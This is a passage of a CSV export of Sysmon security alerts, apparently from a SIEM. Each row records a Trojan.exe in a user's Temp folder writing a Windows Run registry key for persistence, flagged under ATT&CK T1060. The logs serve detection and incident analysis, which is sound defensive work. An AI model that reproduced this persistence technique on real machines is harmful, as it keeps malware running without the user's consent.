..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:28.123285600Z"",""eventRecordID"":""1916"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:28.122\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:28.122"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:30.549",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:27.106 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:27.108037400Z"",""eventRecordID"":""1914"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:27.106\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:27.106"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:29.471",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:26.090 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:26.093397400Z"",""eventRecordID"":""1913"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:26.090\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:26.090"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:28.455",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:25.074 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:25.076549600Z"",""eventRecordID"":""1911"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:25.074\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:25.074"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:27.440",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:24.043 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:24.050008800Z"",""eventRecordID"":""1909"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:24.043\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:24.043"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:26.408",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:23.012 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:23.013425500Z"",""eventRecordID"":""1908"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:23.012\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:23.012"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:25.408",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:21.981 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:21.983270400Z"",""eventRecordID"":""1907"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:21.981\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:21.981"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:24.346",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:20.964 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:20.966312500Z"",""eventRecordID"":""1906"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:20.964\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:20.964"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:23.330",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:19.934 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:19.939708000Z"",""eventRecordID"":""1904"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:19.934\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:19.934"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:22.346",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:18.918 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:18.920202300Z"",""eventRecordID"":""1897"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:18.918\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:18.918"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:21.330",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:17.902 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:17.904475800Z"",""eventRecordID"":""1896"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:17.902\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:17.902"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:20.267",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:16.871 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
